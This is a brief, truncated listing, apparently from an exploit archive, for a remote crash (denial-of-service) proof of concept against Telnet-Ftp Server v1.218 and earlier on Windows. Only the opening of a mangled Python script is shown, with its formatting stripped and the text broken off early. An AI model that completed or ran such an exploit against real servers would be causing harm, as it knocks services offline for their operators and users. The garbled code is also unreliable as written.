Telnet-Ftp Server <= v1.218 Remote Crash PoC
Exploit for windows platform in category dos / poc !/usr/bin/python Telnet-Ftp Server \n" %sys.argv0 sys.exit def checkDefaultUserusername,password: if username == '' and password == '': username = "anonymous" password = "email protected" else: pass return username,password def createUser: userna...